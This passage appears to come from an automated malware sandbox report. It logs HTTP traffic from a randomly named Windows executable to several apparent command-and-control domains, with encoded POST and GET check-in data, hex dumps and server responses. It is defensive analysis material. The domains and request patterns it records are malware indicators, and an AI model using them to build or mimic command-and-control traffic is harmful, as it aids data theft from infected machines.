                                                            Data Raw: 73 56 43 38 7a 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 33 67 74 59 51 74 55 6c 78 4d 32 4c 7a 58 33 48 71 54 30 73 6d 67 66 52 67 71 59 44 57 4a 39 43 37 4e 43 63 52 5a 77 6d 4d 49 55 59 53 56 49 73 42 4c 71 67 35 45 74 2b 6e 73 4f 69 43 4f 4a 4a 54 77 49 66 6b 63 68 31 33 57 72 73 39 36 51 76 70 4a 7a 35 48 41 42 4b 37 63 67 64 6a 6d 30 76 58 67 4b 57 63 63 63 39 64 74 4c 6f 34 57 43 47 43 62 35 4f 6a 6a 69 53 71 74 6a 79 53 53 52 39 67 31 73 65 6c 66 39 65 45 6d 76 62 74 66 34 72 48 55 4f 41 53 79 47 6b 39 32 48 4b 4f 65 45 51 34 47 35 4b 43 55 6b 2f 6f 55 49 42 63 45 71 42 74 76 56 53 4a 77 7a 69 6c 36 53 52 36 46 4a 36 78 31 35 66 50 4b 79 34 46 66 66 63 70 4b 36 68 63 62 31 56 75 6f 7a 46 31 49 4a 31 37 72 77 47 6a 2f 4a 2b 32 44 39 39 59 6d 4b 70 32 42 78 64 62 4b 34 47 38 66 47 55 4e 6d 57 46 6a 4a 7a 6f 61 4c 56 50 58 45 4b 6a 2b 53 79 54 56 41 75 59 70 49 79 44 69 71 53 68 30 62 35 47 6c 70 42 37 56 41 [TRUNCATED]
                                                            Data Ascii: sVC8z=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T3gtYQtUlxM2LzX3HqT0smgfRgqYDWJ9C7NCcRZwmMIUYSVIsBLqg5Et+nsOiCOJJTwIfkch13Wrs96QvpJz5HABK7cgdjm0vXgKWccc9dtLo4WCGCb5OjjiSqtjySSR9g1self9eEmvbtf4rHUOASyGk92HKOeEQ4G5KCUk/oUIBcEqBtvVSJwzil6SR6FJ6x15fPKy4FffcpK6hcb1VuozF1IJ17rwGj/J+2D99YmKp2BxdbK4G8fGUNmWFjJzoaLVPXEKj+SyTVAuYpIyDiqSh0b5GlpB7VAhDsHO07fivWF0h7d3lPjJst98+w9h/BAcpUEXB18/+05nZaoR1Fy9E1VURXpMw5hkC1AJnuo7nP/8wkefZFFfH8aKZZU0Tg8KYVkL91XIk3f83UW5z+SvZJWI/IqM39R++SfHxQLRpS30tW74SkvfW6ILteCaxnRIdx4EASleOAm3ilTUOyWopWpsjRShsRXIFKYXjR0ex6m3na/hatVKa17jtBFg8RjLm3inQ1CK2U68f9VPMPkpBlHHE+38R3TegZo7uyUvZJSC4r298uyTIJC2YMjK7kCRzUzWYrnaiYAaj825qtqqkI3TNGY6kGpoei56A8YFMK0D7Z8IUggG0zpf/SXWEeI0+pS4ZzLVqIA+fiGTBtGJbFFkVMasF6oRnHz9GDLrTZc9vdM4W3Dypp42ylRS/13jcLlRIEo8XRbEUfW9YGdt4YNRnxIXZXaG4OYrKcyvW/u3GP4cHGEPXcBb37NPSpkRIMLGKeOynN2zk7j1KvyfJRvGQF2MRLQpaDr3ws9fa1NiOC3J/1m2IIXMiztwUoHgs1GgrL5/kCgyqf1xZb2KmGp3LsyjlC4jJnDJzCbS0RXy6TXE4hzwasPP59E3XXli4bDBQ0Y0gH0Pp+zxcvRY58PpkK3bA1ve0qTdboHv30CfuYKNHRw6SWPTvWxagbcVe [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.550005104.21.40.167806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:55.732326984 CET370OUTGET /kf1m/?sVC8z=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.zkdamdjj.shop
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Nov 20, 2024 21:10:57.742898941 CET1236INHTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 20 Nov 2024 20:10:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            x-redirect-by: WordPress
                                                            location: https://zkdamdjj.shop/kf1m/?sVC8z=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&PPP=FHWL56
                                                            x-litespeed-cache-control: public,max-age=3600
                                                            x-litespeed-tag: 02a_HTTP.404,02a_HTTP.301,02a_404,02a_URL.fe2f0d048587da8ccb778a9020edc358,02a_
                                                            x-litespeed-cache: miss
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=69g7s59XLZ2tTZjZy%2B%2B8CZdEn6Nx3PgjnY6yEZwiw34CLbIwk6IOphwqrzlZ4JZyvYstr2RQJDICtZMNr1qujV7Q6G4q5xU2ELF%2F6l5qIwFmfC4rZog7Sl4E26CkKGuzrAOiqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e5b16185dee436d-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1711&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=370&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=00000000000000
                                                            Data Raw:
                                                            Data Ascii:
                                                            Nov 20, 2024 21:10:57.742994070 CET20INData Raw: 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 0&ts=0&x=0"0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.55000613.248.169.48806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:11:03.428093910 CET619OUTPOST /k1td/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 206
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.tals.xyz
                                                            Origin: http://www.tals.xyz
                                                            Referer: http://www.tals.xyz/k1td/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 6c 47 6b 52 7a 49 4f 68 36 7a 51 32 66 33 7a 66 57 4c 65 6c 71 64 4e 43 48 32 4f 54 6c 51 64 33 58 46 74 32 41 7a 4a 50 30 52 50 65 67 6f 66 66 6b 4f 53 47 33 5a 56 73 52 73 54 67 6b 50 37 63 58 63 62 49 6c 71 6f 48 49 76 50 77 69 4b 77 65 59 55 45 52 58 6c 62 33 64 67 74 6f 4a 54 36 4e 46 45 58 59 48 67 6f 41 59 64 73 4d 38 39 32 70 48 58 61 78 48 65 66 54 73 30 47 4b 34 56 32 67 78 59 53 30 4e 42 6c 61 61 44 44 45 72 6a 6f 6d 68 33 59 58 6a 41 55 31 6b 36 6b 59 4b 4e 72 71 4a 2f 55 56 63 64 46 59 50 70 6c 53 46 6e 36 46 7a 65 4b 66 6a 66 61 50 58 49 63 52 54 41 2f 6f 50 56 50 62 6c 63 38 3d
                                                            Data Ascii: sVC8z=lGkRzIOh6zQ2f3zfWLelqdNCH2OTlQd3XFt2AzJP0RPegoffkOSG3ZVsRsTgkP7cXcbIlqoHIvPwiKweYUERXlb3dgtoJT6NFEXYHgoAYdsM892pHXaxHefTs0GK4V2gxYS0NBlaaDDErjomh3YXjAU1k6kYKNrqJ/UVcdFYPplSFn6FzeKfjfaPXIcRTA/oPVPblc8=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.55000713.248.169.48806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:11:06.092484951 CET639OUTPOST /k1td/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.tals.xyz
                                                            Origin: http://www.tals.xyz
                                                            Referer: http://www.tals.xyz/k1td/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 6c 47 6b 52 7a 49 4f 68 36 7a 51 32 51 31 6e 66 47 63 4b 6c 2f 4e 4e 42 49 57 4f 54 2b 41 64 7a 58 46 68 32 41 79 4e 66 30 6a 37 65 68 4b 58 66 6c 50 53 47 77 5a 56 73 45 63 53 6b 71 76 37 74 58 63 58 71 6c 71 55 48 49 75 76 77 69 50 4d 65 59 6b 34 57 59 56 62 69 44 41 74 75 58 6a 36 4e 46 45 58 59 48 6a 56 64 59 64 30 4d 38 4e 6d 70 48 32 61 77 5a 75 66 63 76 30 47 4b 75 6c 32 6b 78 59 53 7a 4e 41 70 77 61 42 4c 45 72 6e 73 6d 67 6a 45 57 32 77 55 4a 36 4b 6c 34 44 34 4f 34 4f 75 30 41 56 50 30 71 51 35 78 33 4a 78 4c 76 70 38 43 33 77 2f 32 33 48 62 55 6d 43 77 65 42 56 32 66 72 37 4c 71 6d 4f 74 35 4a 56 6f 59 63 65 76 33 64 6d 2b 33 46 50 34 35 49
                                                            Data Ascii: sVC8z=lGkRzIOh6zQ2Q1nfGcKl/NNBIWOT+AdzXFh2AyNf0j7ehKXflPSGwZVsEcSkqv7tXcXqlqUHIuvwiPMeYk4WYVbiDAtuXj6NFEXYHjVdYd0M8NmpH2awZufcv0GKul2kxYSzNApwaBLErnsmgjEW2wUJ6Kl4D4O4Ou0AVP0qQ5x3JxLvp8C3w/23HbUmCweBV2fr7LqmOt5JVoYcev3dm+3FP45I


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.2.55000813.248.169.48806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:11:08.749001026 CET1656OUTPOST /k1td/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.tals.xyz
                                                            Origin: http://www.tals.xyz
                                                            Referer: http://www.tals.xyz/k1td/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 6c 47 6b 52 7a 49 4f 68 36 7a 51 32 51 31 6e 66 47 63 4b 6c 2f 4e 4e 42 49 57 4f 54 2b 41 64 7a 58 46 68 32 41 79 4e 66 30 6a 6a 65 68 2f 62 66 6b 73 71 47 78 5a 56 73 46 63 53 70 71 76 37 4b 58 63 66 75 6c 71 5a 36 49 72 72 77 6a 70 34 65 54 33 67 57 50 46 62 69 4c 67 74 72 4a 54 37 51 46 45 48 63 48 67 74 64 59 64 30 4d 38 4c 4b 70 4f 48 61 77 62 75 66 54 73 30 47 65 34 56 32 63 78 59 4b 38 4e 41 74 4b 61 79 7a 45 71 48 38 6d 69 51 73 57 30 51 55 78 37 4b 6c 61 44 34 4c 6d 4f 75 6f 4d 56 4b 67 41 51 37 68 33 4b 56 61 77 36 76 75 42 71 4f 69 36 58 5a 67 39 55 45 4f 79 52 48 57 63 35 71 6d 30 50 66 52 6d 62 59 6f 34 4c 2b 6d 31 37 35 50 2b 4b 2b 73 58 36 73 69 4a 34 37 2f 48 67 70 6c 46 54 58 2b 72 4b 77 61 2b 79 71 77 32 64 50 6e 7a 42 37 70 42 78 64 38 64 48 31 30 50 50 76 49 7a 51 61 4e 46 45 41 6f 30 73 6f 69 44 69 31 39 6e 45 74 53 73 35 69 4d 37 79 56 4d 58 58 43 46 30 45 36 70 65 71 4c 6d 30 68 69 6a 79 66 65 31 6f 32 72 78 2f 51 74 79 75 78 79 67 6c 53 63 79 65 7a 75 72 35 [TRUNCATED]
                                                            Data Ascii: sVC8z=lGkRzIOh6zQ2Q1nfGcKl/NNBIWOT+AdzXFh2AyNf0jjeh/bfksqGxZVsFcSpqv7KXcfulqZ6Irrwjp4eT3gWPFbiLgtrJT7QFEHcHgtdYd0M8LKpOHawbufTs0Ge4V2cxYK8NAtKayzEqH8miQsW0QUx7KlaD4LmOuoMVKgAQ7h3KVaw6vuBqOi6XZg9UEOyRHWc5qm0PfRmbYo4L+m175P+K+sX6siJ47/HgplFTX+rKwa+yqw2dPnzB7pBxd8dH10PPvIzQaNFEAo0soiDi19nEtSs5iM7yVMXXCF0E6peqLm0hijyfe1o2rx/QtyuxyglScyezur5pIi0Kn3JtYkZsT+C1kehZ9qAOpE3Lnb3/R3in6/cpB6q9BCZ8F+kWQAUmAIYf0S3P9qgyOfDn0MhoF81vsUjCtQQdZ/LeNKJeau2A2+6d7vV11ZVo/Yv9A6YwGF8NwxVDb6C69J75XU2ZPfm3OtQQxXpJ5ZsGgxIIAQmGIprfHz8yrwXCgpM84TYmjhavD7Kk5JdGBTUqav9XJfe+tW3ONryuXvinYA/LYsYdp94GP+SbHTmKOxErFsC9HuQewEIVoc/GR6yyiZ2DkXo2jFXT+yLrDbmjM8wzo+q9Zu2z9wPDwps7Ry3SEHafGGbhinfzkrAJJUasSSBpORuNAb3ej4PHrlAArbnbxkgwlKrp3YfDnnvBqI6d46J2y67iDzAZmSJQK4ZqJQ1Ay03lUTnGnyvSaFNNpNiXYlgFAp9V9Od+38y96IIOk5gNnxHmBMuWHHfdyI8yoQZvzYBHjCYXSlHW/QT2WOuQS/2/rj9xoRI76MRa6kg/Pgdeoa9GC9zSlIE+AYl3lrAUBXg6ZLigWf6aMVjFcus+par5BLqdjLly8Ze/TWznI0lJPfmVXd8QSK2/AawBIHZFd2TkgvkuogZ7lqJ8NM59lxxEIO0xTzaQ5UyQgvj1r3fxuN0l4IHxz0XJcp4zWTWVqsKCp7bsrvbrnLXzq3hw+ [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            32192.168.2.55000913.248.169.48806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:11:11.403420925 CET365OUTGET /k1td/?sVC8z=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCVG2YOA5cLjPPS3bUYxhUJeAm1ae/P1TsW9+p+FqZ3lrXmQ==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.tals.xyz
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Nov 20, 2024 21:11:12.554590940 CET404INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Wed, 20 Nov 2024 20:11:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 264
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 73 56 43 38 7a 3d 6f 45 4d 78 77 2b 61 62 38 51 6c 45 5a 6d 54 6d 41 62 44 45 75 75 46 6d 41 56 57 78 35 78 4d 48 51 48 4e 70 62 6b 42 4d 78 43 6a 44 72 37 48 6c 6f 64 6e 5a 67 66 46 73 51 4b 47 4b 6b 76 7a 2f 58 59 7a 70 76 50 4d 59 65 70 33 2b 73 5a 73 59 59 48 63 43 56 47 32 59 4f 41 35 63 4c 6a 50 50 53 33 62 55 59 78 68 55 4a 65 41 6d 31 61 65 2f 50 31 54 73 57 39 2b 70 2b 46 71 5a 33 6c 72 58 6d 51 3d 3d 26 50 50 50 3d 46 48 57 4c 35 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sVC8z=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCVG2YOA5cLjPPS3bUYxhUJeAm1ae/P1TsW9+p+FqZ3lrXmQ==&PPP=FHWL56"}</script></head></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            33192.168.2.550010203.161.42.73806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:11:18.119831085 CET655OUTPOST /gn26/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 206
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.brightvision.website
                                                            Origin: http://www.brightvision.website
                                                            Referer: http://www.brightvision.website/gn26/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 51 31 56 38 6c 4b 55 53 31 47 47 6a 68 70 4e 64 55 76 35 63 44 46 68 4c 76 4e 49 75 64 59 6a 6d 52 58 38 79 47 4d 59 6f 72 32 35 48 30 57 72 68 4a 6e 71 31 51 38 69 63 56 4c 32 75 36 4c 67 54 34 49 71 35 74 54 6a 7a 68 63 55 32 44 46 46 4d 42 61 31 56 61 4c 66 66 4c 2f 58 65 30 6d 41 55 75 6d 75 4b 74 32 50 37 52 47 34 4a 2f 45 71 77 50 44 50 30 51 70 35 67 77 4a 4b 54 51 78 75 41 4e 38 55 4a 2b 53 77 35 75 71 50 62 56 59 70 66 4d 44 46 63 6a 39 73 45 57 74 2b 72 45 47 52 5a 50 56 48 46 57 7a 67 53 56 38 70 39 2b 57 55 67 53 45 48 6d 34 6d 49 5a 71 65 67 3d
                                                            Data Ascii: sVC8z=SiBzWWJ1sOT3Q1V8lKUS1GGjhpNdUv5cDFhLvNIudYjmRX8yGMYor25H0WrhJnq1Q8icVL2u6LgT4Iq5tTjzhcU2DFFMBa1VaLffL/Xe0mAUumuKt2P7RG4J/EqwPDP0Qp5gwJKTQxuAN8UJ+Sw5uqPbVYpfMDFcj9sEWt+rEGRZPVHFWzgSV8p9+WUgSEHm4mIZqeg=
                                                            Nov 20, 2024 21:11:19.344311953 CET1236INHTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Nov 2024 20:11:19 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                            Nov 20, 2024 21:11:19.344337940 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                            Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                            Nov 20, 2024 21:11:19.344353914 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                            Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                            Nov 20, 2024 21:11:19.344362974 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                            Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                            Nov 20, 2024 21:11:19.344378948 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                            Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                            Nov 20, 2024 21:11:19.344394922 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                            Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                            Nov 20, 2024 21:11:19.344531059 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                            Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                            Nov 20, 2024 21:11:19.344547033 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                            Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                            Nov 20, 2024 21:11:19.344726086 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                            Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                            Nov 20, 2024 21:11:19.344876051 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                            Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
